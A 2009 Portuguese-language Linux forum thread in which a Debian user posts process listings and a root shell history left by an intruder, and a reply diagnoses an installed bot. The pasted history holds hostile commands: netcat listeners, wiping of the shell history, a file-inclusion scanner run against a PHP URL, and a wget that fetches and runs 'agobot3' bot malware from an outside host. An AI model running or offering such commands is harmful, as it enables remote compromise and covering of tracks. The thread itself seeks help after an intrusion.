Acho que fui invadido

1. Acho que fui invadido

Bona
bonanati

(usa Debian)

Enviado em 23/10/2009 - 10:37h

olá pessoal meu ./bash_history deem uma olhada, eu não fiz nada disso....
Nespaco:/home/fabio# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2096 252 ? Ss Oct13 0:04 init [2]
root 2 0.0 0.0 0 0 ? S< Oct13 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< Oct13 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< Oct13 0:38 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< Oct13 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< Oct13 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< Oct13 3:24 [khelper]
root 10 0.0 0.0 0 0 ? S< Oct13 0:00 [kstop/0]
root 55 0.0 0.0 0 0 ? S< Oct13 0:00 [kintegrityd/0]
root 57 0.0 0.0 0 0 ? S< Oct13 0:00 [kblockd/0]
root 59 0.0 0.0 0 0 ? S< Oct13 0:00 [kacpid]
root 60 0.0 0.0 0 0 ? S< Oct13 0:00 [kacpi_notify]
root 113 0.0 0.0 0 0 ? S< Oct13 0:00 [kseriod]
root 146 0.0 0.0 0 0 ? S< Oct13 0:00 [kondemand/0]
root 165 0.0 0.0 0 0 ? S Oct13 0:04 [pdflush]
root 166 0.0 0.0 0 0 ? S Oct13 0:02 [pdflush]
root 167 0.0 0.0 0 0 ? S< Oct13 0:11 [kswapd0]
root 168 0.0 0.0 0 0 ? S< Oct13 0:00 [aio/0]
root 463 0.0 0.0 0 0 ? S< Oct13 0:00 [ksuspend_usbd]
root 474 0.0 0.0 0 0 ? S< Oct13 0:00 [khubd]
root 725 0.0 0.0 0 0 ? S< Oct13 0:00 [hid_compat]
root 757 0.0 0.0 0 0 ? S< Oct13 0:00 [ata/0]
root 762 0.0 0.0 0 0 ? S< Oct13 0:00 [ata_aux]
root 821 0.0 0.0 0 0 ? S< Oct13 0:19 [kjournald]
root 897 0.0 0.0 2288 220 ? S<s Oct13 0:00 udevd --daemon
root 1194 0.0 0.0 0 0 ? S< Oct13 0:00 [kgameportd]
root 1620 0.0 0.4 5480 2476 ? Ss Oct13 12:30 /sbin/mount.ntf
daemon 1717 0.0 0.0 1888 196 ? Ss Oct13 0:00 /sbin/portmap
statd 1728 0.0 0.0 1952 212 ? Ss Oct13 0:00 /sbin/rpc.statd
root 1939 0.0 0.2 28532 1268 ? Sl Oct13 0:11 /usr/sbin/rsysl
root 1950 0.0 0.0 1764 276 ? Ss Oct13 0:00 /usr/sbin/acpid
103 1960 0.0 0.0 2620 232 ? Ss Oct13 0:00 /usr/bin/dbus-d
root 1975 0.0 0.0 5416 452 ? Ss Oct13 0:06 /usr/sbin/sshd
root 1996 0.0 0.2 6364 1364 ? Ss Oct13 0:00 /usr/sbin/cupsd
101 2263 0.0 0.0 6276 312 ? Ss Oct13 0:00 /usr/sbin/exim4
105 2299 0.0 0.1 5244 844 ? Ss Oct13 0:02 /usr/sbin/hald
root 2300 0.0 0.0 3320 260 ? S Oct13 0:00 hald-runner
root 2319 0.0 0.0 3384 248 ? S Oct13 0:00 hald-addon-inpu
105 2324 0.0 0.0 2268 180 ? S Oct13 0:00 hald-addon-acpi
root 2344 0.0 0.0 14224 372 ? Ss Oct13 0:00 /usr/sbin/gdm
root 2350 0.0 0.0 14688 496 ? S Oct13 0:00 /usr/sbin/gdm
root 2356 0.1 0.3 11260 1736 tty7 Ss+ Oct13 18:35 /usr/X11R6/bin/
root 2368 0.0 0.0 10856 196 ? Ss Oct13 0:00 /usr/sbin/squid
proxy 2370 0.4 38.9 204424 200908 ? S Oct13 59:20 (squid) -D -YC
root 2379 0.0 0.0 3852 336 ? Ss Oct13 0:00 /usr/bin/system
root 2388 0.0 0.1 3736 796 ? Ss Oct13 0:03 /usr/sbin/dhcpd
gdm 2409 0.1 1.5 36300 8124 ? Ss Oct13 18:47 /usr/lib/gdm/gd
proftpd 2410 0.0 0.0 5488 472 ? Ss Oct13 0:05 proftpd: (accep
daemon 2428 0.0 0.0 2044 212 ? Ss Oct13 0:00 /usr/sbin/atd
root 2448 0.0 0.0 3452 408 ? Ss Oct13 0:00 /usr/sbin/cron
root 2556 0.0 0.0 1764 160 tty1 Ss+ Oct13 0:00 /sbin/getty 384
root 2557 0.0 0.0 1764 160 tty2 Ss+ Oct13 0:00 /sbin/getty 384
root 2558 0.0 0.0 1764 160 tty3 Ss+ Oct13 0:00 /sbin/getty 384
root 2561 0.0 0.0 1764 160 tty4 Ss+ Oct13 0:00 /sbin/getty 384
root 2563 0.0 0.0 1764 160 tty5 Ss+ Oct13 0:00 /sbin/getty 384
root 2564 0.0 0.0 1764 160 tty6 Ss+ Oct13 0:00 /sbin/getty 384
root 2929 0.0 0.2 8036 1048 ? Ss Oct13 0:24 /usr/sbin/nmbd
root 2931 0.0 0.3 13776 1576 ? Ss Oct13 0:00 /usr/sbin/smbd
root 2937 0.0 0.1 13656 884 ? S Oct13 0:00 /usr/sbin/smbd
root 4723 0.1 0.3 110632 1832 ? Sl Oct15 17:16 /usr/sbin/ftpdd
root 9948 0.0 0.5 8160 2692 ? Ss 10:44 0:00 sshd: root@pts/
root 10009 0.0 0.1 3888 632 ? S Oct20 0:00 /bin/sh /usr/bi
mysql 10050 0.0 2.6 119328 13700 ? Sl Oct20 1:24 /usr/sbin/mysql
root 10051 0.0 0.0 3004 512 ? S Oct20 0:00 logger -p daemo
root 10100 0.0 0.3 4220 1708 pts/0 Ss 10:45 0:00 -bash
nobody 13175 0.0 0.7 14852 3928 ? S 10:48 0:00 /usr/sbin/smbd
proxy 15182 0.0 0.0 1608 324 ? Ss Oct22 0:00 (unlinkd)
fabio 17931 0.0 0.4 5780 2524 ? S 10:54 0:00 proftpd: fabio
fabio 18593 0.0 0.4 5780 2524 ? S 10:55 0:00 proftpd: fabio
fabio 19736 0.0 0.4 5780 2524 ? S 10:56 0:00 proftpd: fabio
root 21361 0.6 0.8 15088 4328 ? S 10:58 0:01 /usr/sbin/smbd
root 23831 0.0 0.1 3716 1028 pts/0 R+ 11:01 0:00 ps aux
root 23885 0.0 0.4 13264 2156 ? Ss Oct20 0:02 /usr/sbin/apach
www-data 23899 0.0 0.3 13172 1740 ? S Oct20 0:00 /usr/sbin/apach
www-data 23900 0.0 0.5 234940 3008 ? Sl Oct20 0:00 /usr/sbin/apach
www-data 23907 0.0 0.5 234940 2936 ? Sl Oct20 0:00 /usr/sbin/apach
root 30158 0.0 0.9 15232 4804 ? S 09:08 0:02 /usr/sbin/smbd
nobody 30406 0.0 0.9 15072 4820 ? S 09:08 0:02 /usr/sbin/smbd

/root/.bash_history
last
w
sync64 115.84.182.227
w
ps aux
nc -v -n -l -p 1212
w
cat /root/.bash_history
echo cat /root/.bash_history >/root/.bash_history
echo "">/root/.bash_history
w
nc -v -l -p 1212
nc -v -l -p 1212
ps aux
w
cat/root.bash
cat /root/.bash_history
last
sync64 cs-tor.bu.edu
last
locate mysql.conf
locate my.conf
locate my.*
locate mysql
vi /etc/mysql//my.cnf
locate pure*
locate php.ini
locate Php.ini
locate php
cd /var/www
ls
cd ..
ls
cd log
ls
wget http://fimap.googlecode.com/files/fimap_alpha_v05.tar.gz
tar -xvzf imap*
tar -xvzf fima*
ls
cd fim*
ls
./fimap.py
./fimap.py -u "http://localhost/vulnerable.php?inc=index.php"
~ls
ls
./configure
./config.py
chmod 777 *
./config.py
ls
uname -a
cd /tmp
mkdir work
cd work
wget http://www.rosssyndicate.com/.npe/agobot3
chmod +x agobot3
./agobot3
exit
exit



  


2. Re: Acho que fui invadido

Pedro Pereira
pogo

(usa Fedora)

Enviado em 23/10/2009 - 11:12h

Pelo o que parece, você realmente foi invadido e instalaram um bot na sua máquina. Sugiro que mate todos os processos agobot3 e refaça a máquina do 0.

[]'s

Pedro
www.pedropereira.net






Patrocínio

Site hospedado pelo provedor RedeHost.
Linux banner

Destaques

Artigos

Dicas

Tópicos

Top 10 do mês

Scripts